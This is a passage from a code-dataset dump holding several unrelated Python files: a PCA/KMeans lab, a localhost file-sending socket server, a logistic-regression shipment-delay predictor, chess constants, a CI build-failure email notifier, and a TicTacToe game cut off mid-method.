pca3.transform(x_train_reshape_dig2)\ndig2, dig5 = x_train_dig2_approx[mask22], x_train_dig2_approx[mask55]\n\nplt.figure(42)\nplt.scatter(dig2[:, 0], dig2[:, 1], marker='x', label='digit 2', alpha=0.4)\nplt.scatter(dig5[:, 0], dig5[:, 1], marker='+', label='digit 5', alpha=0.4)\nplt.xlabel('$y_1$')\nplt.ylabel('$y_2$')\nplt.legend()\nplt.show()\n\n# --------------------------------- 4c -----------------------------------\nfrom sklearn.cluster import KMeans\nkmeans = KMeans(n_clusters=2, random_state=0).fit(x_train_dig2_approx)\nmask0, mask1 = kmeans.labels_ == 0, kmeans.labels_ == 1\nx0, x1 = x_train_dig2_approx[mask0], x_train_dig2_approx[mask1]\nplt.figure(43)\nplt.xlabel('$y_1$')\nplt.ylabel('$y_2$')\nplt.scatter(x0[:, 0], x0[:, 1], label='cluster 0', marker='+')\nplt.scatter(x1[:, 0], x1[:, 1], label='cluster 1', marker='x')\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], label='center', marker='^', c='k')\nplt.show()\n","sub_path":"warm/Lab7_2.py","file_name":"Lab7_2.py","file_ext":"py","file_size_in_byte":5206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"545663503","text":"#!/usr/bin/python3\nimport os\nimport sys\n\nimport socket\n\ndef sender(cliaddr,conn,requestedFile):\n    # completed stub: stream the requested file back to the client in chunks\n    f1=open(requestedFile,'rb')\n    data=f1.read(4096)\n    while data:\n        conn.sendall(data)\n        data=f1.read(4096)\n    f1.close()\n\n\ndef client(conn,cliaddr):\n    msg=\"These are the available files enter the number of the file you want to download:\\\n\"\n    files=os.listdir('hostedFiles')\n    print(files)\n    number=0\n    for i in files:\n        msg=msg+str(number)+\": \"+i+\"\\\n\"\n        number+=1\n    os.chdir('hostedFiles')\n    print(msg)\n    conn.send(msg.encode('ascii'))\n    requestedFile=conn.recv(4)\n    requestedFile=int(requestedFile)\n    if requestedFile>=0 and requestedFile<number:\n        print(cliaddr,\" requested: \",files[requestedFile])\n        msg=\"Getting your file\"\n        conn.send(msg.encode('ascii'))\n    else:\n        print(cliaddr,\" requested invalid file\")\n        msg=\"Bad request\"\n        conn.send(msg.encode('ascii'))\n        return\n    sender(cliaddr,conn,files[requestedFile])\n\n    return\nl=sys.argv\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.bind(('127.0.0.1',5500))\ns.listen(10)\nwhile True:\n    conn,cliaddr=s.accept()\n    print(\"Got connection from: \", cliaddr)\n    client(conn,cliaddr)\n    break\n","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"381393361","text":"import pyodbc\nimport pandas as pd\nimport numpy as np\nimport math\nimport datetime\nimport os\nfrom patsy import dmatrices,dmatrix\nfrom sklearn.linear_model import LogisticRegression\n\nnow = datetime.datetime.now()\nnow_tz=datetime.datetime.now().astimezone().tzinfo\nnow = pd.Timestamp(now).tz_localize(now_tz)\n\n\ndef get_dummies(data):\n    dummies=pd.get_dummies(data['Code'])\n    data['Appt_dummy']=dummies['Appt'].tolist()\n    data['Notice_dummy']=dummies['Notice'].tolist()\n    data['Open_dummy']=dummies['Open'].tolist()\n    return data\n\ndef generate_results(daily_results):\n    progress =[\"Available\", \"Covered\", \"Dispatched\", \"Loading Start\", \"Picked Up\", \"Unloading Start\", \"Delivered\",\n               \"Invoiced\"]\n    # loadtype<-c\n    result_file=\"DelayPredictor\" + now.strftime(\"%Y%m%d%H%M\")+\".csv\"\n    stoptype =[\"PickUp\", \"Delivery\"]\n\n    columnnames =['LoadID','ProgressType','Parent_Customer','LoadType','NextStop_Type','NextStop_City/State','ETA','RiskScore','LeadingReason']\n    result_df = pd.DataFrame( columns=columnnames)\n    loadids=set 
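# --- Added sketch: a hypothetical client counterpart to the sender.py record
# above.  The wire protocol (text menu, then a 4-byte file index, then raw
# bytes until the server closes the socket) is inferred from that code; note
# the server also sends a short status message first, which this sketch does
# not strip from the output file.
import socket

def fetch_file(index, out_path, host='127.0.0.1', port=5500):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print(s.recv(4096).decode('ascii'))           # the file menu
    s.send(str(index).ljust(4).encode('ascii'))   # server does int(conn.recv(4))
    with open(out_path, 'wb') as f:
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            f.write(chunk)
    s.close()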
(daily_results['LoadID'].tolist())\n for lid in loadids:\n loaddata=daily_results[daily_results['LoadID']==lid]\n if len(loaddata[loaddata['arrived']== 0])>0:\n nextstop=loaddata[loaddata['arrived']== 0].iloc[0] #needs to verify whether it is loc or iloc\n stop_result={'LoadID':lid,\n 'ProgressType': progress[int(loaddata.iloc[0]['ProgressType'])],\n 'Parent_Customer':loaddata.iloc[0]['Customer'],\n 'LoadType':loaddata.iloc[0]['Load_M_B'],\n 'NextStop_Type': stoptype[int(nextstop['PDType'])],\n 'NextStop_City/State':nextstop['StateCode'],\n 'ETA':str(nextstop['ETA']), # there is a problem in ETA data type\n 'RiskScore':int(nextstop['RiskScore']),\n 'LeadingReason':nextstop['Reason']\n }\n result_df=result_df.append(stop_result, ignore_index=True)\n else:\n result_df =result_df.append({'LoadID':lid,\n 'ProgressType': progress[int(loaddata.iloc[0]['ProgressType'])],\n 'Parent_Customer':loaddata.iloc[0]['Customer'],\n 'LoadType':loaddata.iloc[0]['Load_M_B'],\n 'NextStop_Type':'-',\n 'NextStop_City/State':'-',\n 'ETA':'-',\n 'RiskScore':'-',\n 'LeadingReason':'-'}, ignore_index=True)\n result_df.to_csv(result_file,index=False)\n return(0)\n\ndef ontime_score(testData,threshold):\n relaxation = 0.98\n threshold=threshold * relaxation\n A_P = 1\n D_M = 0\n # thresholds<-quantile(testData$ontime_prob,c(D_level,C_level,B_level,A_level),names=FALSE)\n thresholdscore = 50.0\n for i in range(len(testData)):\n if testData['ontime_prob'].iloc[i] > threshold:\n lowerbound = threshold\n upperbound = A_P\n L_score = thresholdscore / 20\n H_score = 5\n else:\n lowerbound = D_M\n upperbound = threshold\n H_score = thresholdscore / 20\n L_score = 0\n\n testData['SafeScore'].iloc[i]=(L_score+(testData['ontime_prob'].iloc[i]-lowerbound) * (H_score-L_score) / (upperbound-lowerbound))\n return (testData)\n\ndef reason(coef,outputdata,inputdata,flag):\n if flag==1:\n names = [\"preStop_OnTime\", \"preStop_Duration\", \"dist\", \"f_rate\", \"cust_rate\"]\n reasons = [\"PreStop_Delay\", \"PreStop_Duration\", \"Distance\", \"Facility\", \"Customer\"]\n if flag==2:\n names = [\"preStop_OnTime\", \"preStop_Duration\", \"dist\", \"f_rate\", \"cust_rate\",\"carrier_rate\",\"latebooking\"]\n reasons = [\"PreStop_Delay\", \"PreStop_Duration\", \"Distance\", \"Facility\", \"Customer\",\"Carrier\",\"Late_Book\"]\n if flag==3:\n names = [\"preStop_OnTime\", \"preStop_Duration\", \"dist\", \"f_rate\", \"cust_rate\",\"carrier_rate\"]\n reasons = [\"PreStop_Delay\", \"PreStop_Duration\", \"Distance\", \"Facility\", \"Customer\",\"Carrier\"]\n refervalue =[]\n coef = coef[0][3:] # there is dimensional problem, coef is a 2d matrix, we need to be careful with that.\n #coef=coef.fillna(0, inplace=True)\n for i in range (0,len(names)):\n refervalue.append(pd.DataFrame.mean(inputdata[names[i]]))\n for i in outputdata.index:\n delta = (outputdata[names].loc[i]-refervalue).tolist() * coef\n #output['Reason'].loc[i] = np.where(output['Reason'].loc[i] == \"\" or output['Reason'].loc[i].isnull(),reasons[np.argmin(delta)],output['Reason'].loc[i])\n # we do not use np.where as it returns an array. we could use tolist() to change the one element array into a number, but it may be resource consuming\n outputdata['Reason'].loc[i] =reasons[np.argmin(delta)] if outputdata['Reason'].loc[i] == \"\" else outputdata['Reason'].loc[i]\n return (outputdata)\n\ndef gml_stage(inputdata,outputdata,flag):\n # for stage 1, no carrier is booked\n # instead of using C(Code) but dummies, will make sure there is no dimensional change, i.e. 
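# --- Added worked example (not in the original module): ontime_score maps an
# on-time probability onto a 0-5 scale that is piecewise linear around the
# relaxed threshold, with a hinge at thresholdscore/20 = 2.5.  For a relaxed
# threshold of 0.8 * 0.98 = 0.784:
#   prob = 0.784 -> 2.5   (the hinge)
#   prob = 1.0   -> 5.0   (top of the upper segment)
#   prob = 0.392 -> 1.25  (halfway up the lower segment)
def _score(prob, threshold):
    lo, hi = (threshold, 1.0) if prob > threshold else (0.0, threshold)
    l_s, h_s = (2.5, 5.0) if prob > threshold else (0.0, 2.5)
    return l_s + (prob - lo) * (h_s - l_s) / (hi - lo)

assert abs(_score(1.0, 0.784) - 5.0) < 1e-9
assert abs(_score(0.392, 0.784) - 1.25) < 1e-9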
maybe some dataset do not have all the levels of categories, if we use C(), it will be one dimension less than the trainning set\n if flag==1:\n X_test = dmatrix('Appt_dummy + Notice_dummy+ preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate', outputdata,\n return_type='dataframe')\n y, X = dmatrices('ontime ~ Appt_dummy + Notice_dummy + preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate', inputdata,\n return_type='dataframe')\n elif flag==2:\n y, X = dmatrices(\n 'ontime ~ Appt_dummy + Notice_dummy + preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate + carrier_rate + latebooking',\n inputdata, return_type='dataframe')\n X_test = dmatrix(\n 'Appt_dummy + Notice_dummy+ preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate + carrier_rate + latebooking',\n outputdata, return_type='dataframe')\n else:\n y, X = dmatrices(\n 'ontime ~ Appt_dummy + Notice_dummy+ preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate + carrier_rate', inputdata,\n return_type='dataframe')\n X_test = dmatrix('Appt_dummy + Notice_dummy + preStop_OnTime + preStop_Duration + dist + f_rate + cust_rate + carrier_rate',\n outputdata, return_type='dataframe')\n model = LogisticRegression(fit_intercept=False)\n mdl = model.fit(X, np.ravel(y))\n rate_result = model.predict(X_test)\n rate = model.predict_proba(X_test)[:,1]\n # dummy_ranks = pd.get_dummies(inputdata['Code'], prefix='Code')\n # cols_to_keep = ['preStop_OnTime','preStop_Duration','dist','f_rate','cust_rate']\n # data = inputdata[cols_to_keep].join(dummy_ranks.ix[:, 'Code_1':])\n # data['intercept'] = 1.0\n return rate,rate_result,model.coef_\n\n\ndef get_results(traindata,testdata,flag):\n for Type in set(traindata['PDType'].tolist()):\n if len(testdata[testdata['PDType']==Type].axes[0])> 0:\n rate, delay_result,coef = gml_stage(traindata[traindata['PDType'] == Type ], testdata[testdata['PDType'] == Type],flag)\n testdata['ontime_prob'][testdata['PDType'] == Type] = rate\n testdata['ontime_pred'][testdata['PDType'] == Type] = delay_result\n threshold = pd.DataFrame.mean(traindata[traindata.PDType == Type]['ontime'])\n testdata[testdata['PDType'] == Type] = ontime_score (testdata[testdata['PDType'] == Type], threshold)\n testdata['ontime_pred'][testdata['PDType'] == Type] = (rate > threshold * 0.98)\n testdata[\"Reason\"][(testdata['ETA_ontime'] == 0) & (testdata['arrived'] == 0 )& (testdata['Reason'].isin([\"\",\"NAN\"])) ] = \"ETA_Delay\"\n testdata[\"ontime_pred\"][testdata['ETA_ontime'] == 0] = -2\n if len(testdata[(testdata['PDType']==Type) & (testdata['SafeScore']<2.5) & (testdata['arrived'] == 0)].axes[0])>0:\n testdata[(testdata['PDType']==Type) &(testdata['ontime_prob']<0.95)& (testdata['arrived'] == 0)] = reason(coef,testdata[(testdata['PDType']==Type) &(testdata['ontime_prob']<0.95)& (testdata['arrived']== 0)],traindata[traindata['PDType']==Type],flag)\n return (testdata)\n\n\n\ndef delay_predictor(trainData, testData):\n\n \"\"\"main recommendation function\n\n Args:\n carrier_load: Pandas DF with historical loads for the carrier.\n trucks_df: Pandas DF with truck(s) (orig,dest,ready date, etc.) 
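# --- Added sketch (not part of the original module): why the code above feeds
# pre-built Appt/Notice dummy columns to patsy instead of C(Code).  C()
# derives its levels from the data it is given, so a scoring batch that is
# missing a level produces a design matrix with fewer columns than the
# training one, while fixed 0/1 dummy columns keep the width constant.
import pandas as pd
from patsy import dmatrix

train = pd.DataFrame({'Code': ['Appt', 'Notice', 'Open']})
test = pd.DataFrame({'Code': ['Appt', 'Appt']})   # 'Notice'/'Open' absent
print(dmatrix('C(Code)', train).shape)  # 3 columns: intercept + 2 level dummies
print(dmatrix('C(Code)', test).shape)   # fewer columns -> predict() would fail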
sent to search()\n \"\"\"\n testData = get_dummies(testData)\n trainData = get_dummies(trainData)\n testData['ontime_prob'] = -1\n testData['ontime_pred'] = -1\n testData['SafeScore'] = -1\n testData['RiskScore'] = -1\n testData['CheckScore'] = -1\n testData_1 = testData[testData['ProgressType'] == 1]\n if len(testData_1.axes[0]) > 0:\n testData_1[testData_1['StopSequence'] == 1] = get_results(trainData[trainData['StopSequence'] == 1],\n testData_1[testData_1['StopSequence'] == 1], 1)\n max_stop = max(testData_1.NumStops) + 1\n nrow_testData_1 = len(testData_1)\n for k in range(2, max_stop):\n for i in range(nrow_testData_1):\n if testData_1['StopSequence'].iloc[i] == k:\n if testData_1['arrived'].iloc[i - 1] == 0:\n testData_1['preStop_OnTime'].iloc[i] = testData_1['ontime_prob'].iloc[i - 1]\n testData_1[testData_1['StopSequence'] == k] = get_results(trainData[trainData['StopSequence'] > 1],\n testData_1[testData_1['StopSequence'] == k], 1)\n\n # Stage 2\n testData_2 = testData[testData['ProgressType'] > 1]\n testData_2[testData_2['StopSequence'] == 1] = get_results(trainData[trainData['StopSequence'] == 1],\n testData_2[testData_2['StopSequence'] == 1], 2)\n # testData[(testData['ProgressType'] > 1) & (testData['StopSequence'] == 1)]=Get_Results(trainData[trainData['StopSequence'] == 1],testData[(testData['ProgressType'] > 1) & (testData['StopSequence'] == 1)], 1)\n max_stop = max(testData_2.NumStops) + 1\n nrow_testData_2 = len(testData_2)\n for k in range(2, max_stop):\n # for i in testData_2.index:\n for i in range(nrow_testData_2):\n if testData_2['StopSequence'].iloc[i] == k:\n if testData_2['arrived'].iloc[i - 1] == 0:\n testData_2['preStop_OnTime'].iloc[i] = testData_2['ontime_prob'].iloc[i - 1]\n testData_2[testData_2['StopSequence'] == k] = get_results(trainData[trainData['StopSequence'] > 1],\n testData_2[testData_2['StopSequence'] == k], 3)\n # for k in range(2, max_stop):\n # #for i in testData_2.index:\n # for i in range(nrow_testData_2):\n # if testData_2['StopSequence'].iloc[i] == k:\n # if testData_2['arrived'].iloc[i - 1] == 0:\n # testData_2['preStop_OnTime'].iloc[i] = testData_2['ontime_prob'].iloc[i - 1]\n # testData_2[testData_2['StopSequence']==k]=Get_Results(trainData[trainData['StopSequence'] > 1], testData_2[testData_2['StopSequence'] == k],3)\n # testData_2_pred.append(Get_Results(trainData[trainData['StopSequence'] > 1], testData_2[testData_2['StopSequence'] == k],3))\n testData_df = pd.concat([testData_1, testData_2])\n testData_df['RiskScore'] = 100 - testData_df['SafeScore'] * 20\n\n # numstop = max(testData_df['NumStops'])\n\n # results = testData_df[[\"LoadID\", \"LoadDate\", \"Customer\", \"Load_M_B\", \"ProgressType\", \"StopSequence\",\n # \"SafeScore\", \"Reason\", \"Arrival\"]].sort(['LoadDate', 'LoadID'], ascending=[1, 0])\n testData_df['CheckScore'][(testData_df['ETA_ontime'] == 0) & (testData_df['StopSequence'] == 1) & (\n testData_df['ETA'] - testData_df['Appt'] <= datetime.timedelta(0, 90 * 60))] = 80\n testData_df['CheckScore'][(testData_df['ETA_ontime'] == 0) & (testData_df['StopSequence'] == 1) & (\n testData_df['ETA'] - testData_df['Appt'] > datetime.timedelta(0, 90 * 60))] = 20\n testData_df['CheckScore'][(testData_df['ETA_ontime'] == 0) & (testData_df['StopSequence'] > 1)] = 20\n testData_df['CheckScore'][(testData_df['arrived'] > 0) & (\n testData_df['Arrival'] - testData_df['Appt'] > datetime.timedelta(0, 60 * 60))] = 100\n testData_df['CheckScore'][(testData_df['arrived'] > 0) & (\n testData_df['Arrival'] - testData_df['Appt'] <= 
datetime.timedelta(0, 60 * 60))] = 0\n\n results = testData_df[\n [\"LoadID\", \"LoadDate\", \"Customer\", \"ProgressType\", \"StopSequence\", \"ontime_prob\", \"ontime_pred\",\n \"SafeScore\", \"Reason\"]]\n\n results['RiskScore_2'] = np.ceil(results['SafeScore'])\n results.to_csv(\"OnTime_Predict\" + now.strftime(\"%Y%m%d%H%M\") + \".csv\", index=False)\n testData_df.to_csv(\"testdata\" + now.strftime(\"%Y%m%d%H%M\") + \".csv\", index=False)\n\n generate_results(testData_df)\n\n return (testData_df)\n\n","sub_path":"engines/delay_predictor.py","file_name":"delay_predictor.py","file_ext":"py","file_size_in_byte":13281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"613860062","text":"BLANK = None\nBLANK_CHAR = ' '\nPAWN = 'p'\nBISHOP = 'b'\nQUEEN = 'q'\nKING = 'k'\nKNIGHT = 'n'\nROOK = 'r'\nWHITE = 'white'\nBLACK = 'black'\nINVALID_PAWN_MOVE = \"Invalid pawn move.\"\nMOVE_OUT_OF_BOUNDS = \"Move position is out of bounds.\"\nINVALID_INPUT_COLOR = \"Color must be either black or white\"\nPIECE_CHARS = ['n', 'b', 'r', 'k', 'q', 'p']\nBOARD_CHARS = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']\nBOARD_NUMS = [i for i in range(1, 9)]\n\n\ndef get_other_color(color):\n if str(color).__eq__(WHITE):\n return BLACK\n elif str(color).__eq__(BLACK):\n return WHITE\n else:\n raise ValueError(INVALID_INPUT_COLOR)\n","sub_path":"sample/helpers/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"8211586","text":"from __future__ import absolute_import, print_function\n\nfrom flask import render_template\nfrom flask_mail import Message, sanitize_address\n\nfrom changes.config import db, mail\nfrom changes.constants import Result, Status\nfrom changes.models import (\n Job, JobPlan, TestGroup, ProjectOption, LogSource, LogChunk, ItemOption,\n Source\n)\nfrom changes.utils.http import build_uri\n\n\ndef get_test_failures(job):\n return sorted([t.name_sha for t in db.session.query(\n TestGroup.name_sha,\n ).filter(\n TestGroup.job_id == job.id,\n TestGroup.result == Result.failed,\n TestGroup.num_leaves == 0,\n )])\n\n\ndef should_notify(job):\n \"\"\"\n Compare with parent job (previous job) and confirm if current\n job provided any change in state (e.g. 
new failures).\n \"\"\"\n if job.result not in (Result.failed, Result.passed):\n return\n\n parent = Job.query.join(\n Source, Source.id == Job.source_id,\n ).filter(\n Source.patch_id == None, # NOQA\n Source.revision_sha != job.build.source.revision_sha,\n Job.project == job.project,\n Job.date_created < job.date_created,\n Job.status == Status.finished,\n Job.result.in_([Result.passed, Result.failed]),\n ).order_by(Job.date_created.desc()).first()\n\n # if theres no parent, this job must be at fault\n if parent is None:\n return job.result == Result.failed\n\n if job.result == Result.passed == parent.result:\n return False\n\n current_failures = get_test_failures(job)\n # if we dont have any testgroup failures, then we cannot identify the cause\n # so we must notify the individual\n if not current_failures:\n return True\n\n parent_failures = get_test_failures(parent)\n if parent_failures != current_failures:\n return True\n\n return False\n\n\ndef get_log_clipping(logsource, max_size=5000, max_lines=25):\n queryset = LogChunk.query.filter(\n LogChunk.source_id == logsource.id,\n )\n tail = queryset.order_by(LogChunk.offset.desc()).limit(1).first()\n\n chunks = list(queryset.filter(\n (LogChunk.offset + LogChunk.size) >= max(tail.offset - max_size, 0),\n ).order_by(LogChunk.offset.asc()))\n\n clipping = ''.join(l.text for l in chunks).strip()[-max_size:]\n # only return the last 25 lines\n clipping = '\\r\\n'.join(clipping.splitlines()[-max_lines:])\n\n return clipping\n\n\ndef send_notification(job, recipients):\n # TODO(dcramer): we should send a clipping of a relevant job log\n test_failures = TestGroup.query.filter(\n TestGroup.job_id == job.id,\n TestGroup.result == Result.failed,\n TestGroup.num_leaves == 0,\n ).order_by(TestGroup.name.asc())\n num_test_failures = test_failures.count()\n test_failures = test_failures[:25]\n\n build = job.build\n\n # TODO(dcramer): we should probably find a better way to do logs\n primary_log = LogSource.query.filter(\n LogSource.job_id == job.id,\n ).order_by(LogSource.date_created.asc()).first()\n if primary_log:\n log_clipping = get_log_clipping(\n primary_log, max_size=5000, max_lines=25)\n\n subject = u\"Build {result} - {project} #{number} ({target})\".format(\n number='{0}.{1}'.format(job.build.number, job.number),\n result=unicode(job.result),\n target=build.target or build.source.revision_sha or 'Unknown',\n project=job.project.name,\n )\n\n for testgroup in test_failures:\n testgroup.uri = build_uri('/testgroups/{0}/'.format(testgroup.id.hex))\n\n job.uri = build_uri('/jobs/{0}/'.format(job.id.hex))\n build.uri = build_uri('/builds/{0}/'.format(build.id.hex))\n\n context = {\n 'job': job,\n 'build': job.build,\n 'total_test_failures': num_test_failures,\n 'test_failures': test_failures,\n }\n\n if primary_log:\n context['build_log'] = {\n 'text': log_clipping,\n 'name': primary_log.name,\n 'link': '{0}logs/{1}/'.format(job.uri, primary_log.id.hex),\n }\n\n msg = Message(subject, recipients=recipients, extra_headers={\n 'Reply-To': ', '.join(sanitize_address(r) for r in recipients),\n })\n msg.body = render_template('listeners/mail/notification.txt', **context)\n msg.html = render_template('listeners/mail/notification.html', **context)\n\n mail.send(msg)\n\n\ndef get_job_options(job):\n option_names = [\n 'mail.notify-author',\n 'mail.notify-addresses',\n 'mail.notify-addresses-revisions',\n ]\n\n # get relevant options\n options = dict(\n db.session.query(\n ProjectOption.name, ProjectOption.value\n ).filter(\n ProjectOption.project_id == 
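# --- Added illustration (not from the original listener): the clipping done
# by get_log_clipping above boils down to "keep the last max_size bytes, then
# the last max_lines lines".  The same trim on a plain string, with toy limits:
def clip_tail(text, max_size=20, max_lines=2):
    clipped = text.strip()[-max_size:]
    return '\r\n'.join(clipped.splitlines()[-max_lines:])

assert clip_tail('line1\nline2\nline3\nline4') == 'line3\r\nline4'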
job.project_id,\n ProjectOption.name.in_(option_names),\n )\n )\n\n # if a plan was specified, it's options override the project's\n job_plan = JobPlan.query.filter(\n JobPlan.job_id == job.id,\n ).first()\n if job_plan:\n plan_options = db.session.query(\n ItemOption.name, ItemOption.value\n ).filter(\n ItemOption.item_id == job_plan.plan_id,\n ItemOption.name.in_(option_names),\n )\n # determine plan options\n for key, value in plan_options:\n options[key] = value\n\n return options\n\n\ndef job_finished_handler(job, **kwargs):\n options = get_job_options(job)\n\n recipients = []\n if options.get('mail.notify-author', '1') == '1':\n author = job.build.author\n if author:\n recipients.append(u'%s <%s>' % (author.name, author.email))\n\n if options.get('mail.notify-addresses'):\n recipients.extend(\n # XXX(dcramer): we dont have option validators so lets assume people\n # enter slightly incorrect values\n [x.strip() for x in options['mail.notify-addresses'].split(',')]\n )\n\n if not job.build.source.patch_id:\n if options.get('mail.notify-addresses-revisions'):\n recipients.extend(\n [x.strip() for x in options['mail.notify-addresses-revisions'].split(',')]\n )\n\n if not recipients:\n return\n\n if not should_notify(job):\n return\n\n send_notification(job, recipients)\n","sub_path":"changes/listeners/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"429905493","text":"# COSC 1336, Lab 10, Problem 3 (enhanced)\n# Robert Morales\n\nimport tkinter as tk\nimport tkinter.messagebox as msgbox\nimport random\nfrom itertools import permutations\n\nclass Board:\n \"\"\"\n Class representing a TicTacToe board.\n \"\"\"\n\n def __init__(self):\n \"\"\" Initializes the board object. \"\"\"\n self.__data = [[None]]\n\n def create(self, size = 3):\n \"\"\" Creates a TicTacToe board with the given size. \"\"\"\n if size < 3:\n raise ValueError('board size must be ≥ 3')\n self.__data = [[None for col in range(size)] for row in range(size)]\n return self\n\n def assign(self, data):\n \"\"\" Initializes the TicTacToe board from existing data. \"\"\"\n if len(data) != len(data[0]):\n raise ValueError(\"array must be square\")\n if len(data) < 3:\n raise ValueError('board size must be ≥ 3')\n self.__data = [[col for col in row] for row in data]\n return self\n\n def copy(self):\n \"\"\" Returns a copy of the TicTacToe board's data. \"\"\"\n return [[col for col in row] for row in self.__data]\n\n def size(self):\n \"\"\" Returns the number of rows and number of columns. \"\"\"\n return len(self.__data)\n\n def row(self, row_index):\n \"\"\" Returns all symbols in the specified row. \"\"\"\n return [el for el in self.__data[row_index]]\n\n def col(self, col_index):\n \"\"\" Returns all symbols in the specified column. \"\"\"\n return [row[col_index] for row in self.__data]\n\n def symbol(self, row_index, col_index):\n \"\"\" Returns the specified symbol at the row and column indices. \"\"\"\n return self.__data[row_index][col_index]\n\n def symbols(self, positions):\n \"\"\" Returns symbols at all specified row/column positions. \"\"\"\n return [self.__data[rx][cx] for rx,cx in positions]\n\n def is_blank(self, row_index, col_index):\n \"\"\" Determines if the specified cell is blank. \"\"\"\n return self.__data[row_index][col_index] is None\n\n def set_symbol(self, sym, row_index, col_index):\n \"\"\" Assigns the symbol to the specified cell in the board. 
\"\"\"\n self.__data[row_index][col_index] = sym\n\n def blanks(self):\n \"\"\" Returns the row and column indices of all blank symbols. \"\"\"\n return [(rx, cx) for rx, row in enumerate(self.__data) \\\n for cx, col in enumerate(row) if col is None]\n\n def num_blanks(self):\n \"\"\" Return the number of blank symbols. \"\"\"\n return len([col for row in self.__data for col in row if col is None])\n\n def diagonal(self, direction):\n \"\"\"\n Returns an iterator for all symbols in the specified diagonal pattern.\n \"\"\"\n size = self.size()\n temp = []\n if direction in ('left', '<'):\n for rx in range(size-1, -1, -1):\n yield self.__data[rx][rx]\n elif direction in ('right', '>'):\n for rx in range(size):\n yield self.__data[rx][size-rx-1]\n else:\n raise ValueError(\"invalid input: `direction` should be 'left' or 'right'\")\n\n def midpoint(self):\n \"\"\" Returns the center position of the board. \"\"\"\n idx = self.size() // 2\n return (idx, idx)\n\n def corners(self):\n \"\"\" Returns an iterator for the symbols in each corner of the board. \"\"\"\n for rx in [0,-1]:\n for cx in [0,-1]:\n yield self.__data[rx][cx]\n\n def side(self, side):\n \"\"\"\n Returns an iterator for all symbols from one side of the board.\n The 'side' parameter is a string that specifies either top, bottom,\n left, or right. The symbols '^', '_', '<', and '>' can also be used.\n \"\"\"\n size = len(self.__data)\n if side in ('^', 'top'):\n for cx in range(1,size-1):\n yield self.__data[0][cx]\n elif side in ('_', 'bottom'):\n for cx in range(1,size-1):\n yield self.__data[-1][cx]\n elif side in ('<', 'left'):\n for rx in range(1,size-1):\n yield self.__data[rx][0]\n elif side in ('>', 'right'):\n for rx in range(1,size-1):\n yield self.__data[rx][-1]\n else:\n raise ValueError(\"invalid request\")\n\n def side_positions(self):\n \"\"\"\n Returns an iterator for the row/column indices of \n all side positions on the board.\n \"\"\"\n sides = [(x,y) for x in [0,-1] for y in list(range(1, self.size()-1))]\n for i in range(len(sides)):\n for p in permutations(sides[i]):\n yield p\n\n def __str__(self):\n \"\"\" Returns the TicTacToe board as an ASCII drawing. \"\"\"\n strings = []\n strings.append('')\n for rx in range(self.size()):\n row_str = ''\n for cx in range(self.size()):\n sym = self.get_symbol(rx, cx) or ' '\n row_str += ' ' + sym\n if cx < self.num_cols()-1:\n row_str += ' |'\n strings.append(row_str)\n if rx < self.num_rows()-1:\n strings.append(('-----' * (self.num_cols()-1)) + '-')\n strings.append('')\n return str.join('\\n', strings)\n\nclass Game:\n def __init__(self):\n \"\"\" Initializes the Game object. \"\"\"\n self.board = None\n self.sym_user = None\n self.sym_cpu = None\n\n def new(self, size = 3, symbols = ('X', 'O')):\n \"\"\"\n Creates a new game.\n\n By default a 3x3 board is created with symbols 'X' representing\n the user and 'O' representing the computer. These parameters\n can be changed via 'size' and 'symbols', respectively.\n \"\"\"\n\n self.sym_user, self.sym_cpu = symbols\n self.board = Board()\n self.board.create(size)\n\n def move_user(self, row, col):\n \"\"\" Places the user's move. 
\"\"\"\n try:\n over, winner = self.status()\n if (not over) and self.board.is_blank(row, col):\n self.board.set_symbol(self.sym_user, row, col)\n return True\n else:\n return False\n except IndexError:\n raise IndexError(\"invalid row/column index\")\n\n def move_computer(self):\n \"\"\"\n Chooses the CPU's move using a predetermined strategy.\n \"\"\"\n over, winner = self.status()\n if over:\n return (None, None)\n\n board = self.board\n blanks = board.blanks()\n\n # the following symbol aliases are used for typing convenience\n X = self.sym_user\n O = self.sym_cpu\n\n # determine if we can win by placing 'o' in all the blanks\n for rx, cx in blanks:\n board.set_symbol(O, rx, cx)\n over, winner = self.status()\n if over and winner == O:\n return (rx, cx)\n else:\n board.set_symbol(None, rx, cx)\n\n # block opponent from winning on their next move\n for rx, cx in blanks:\n board.set_symbol(X, rx, cx)\n over, winner = self.status()\n if over and winner == X:\n board.set_symbol(O, rx, cx)\n return (rx, cx)\n else:\n board.set_symbol(None, rx, cx)\n\n # block opponent's fork, if we have the midpoint\n rx, cx = board.midpoint()\n if board.symbol(rx, cx) == O and X in board.corners():\n # avoid playing a corner!\n for rx, cx in board.side_positions():\n if board.is_blank(rx, cx):\n board.set_symbol(O, rx, cx)\n return (rx, cx)\n\n # go for the center\n rx, cx = board.midpoint()\n if board.is_blank(rx, cx):\n board.set_symbol(O, rx, cx)\n return (rx, cx)\n\n # choose an empty corner\n for rx, cx in [(0,0), (0,-1), (-1,0), (-1,-1)]:\n if board.is_blank(rx, cx):\n board.set_symbol(O, rx, cx)\n return (rx, cx)\n\n # choose an empty side\n for rx, cx in board.side_positions():\n if board.is_blank(rx, cx):\n board.set_symbol(O, rx, cx)\n return (rx, cx)\n\n # choose randomly, if there's absolutely nothing left...\n rx, cx = random.choice(blanks)\n board.set_symbol(O, rx, cx)\n return 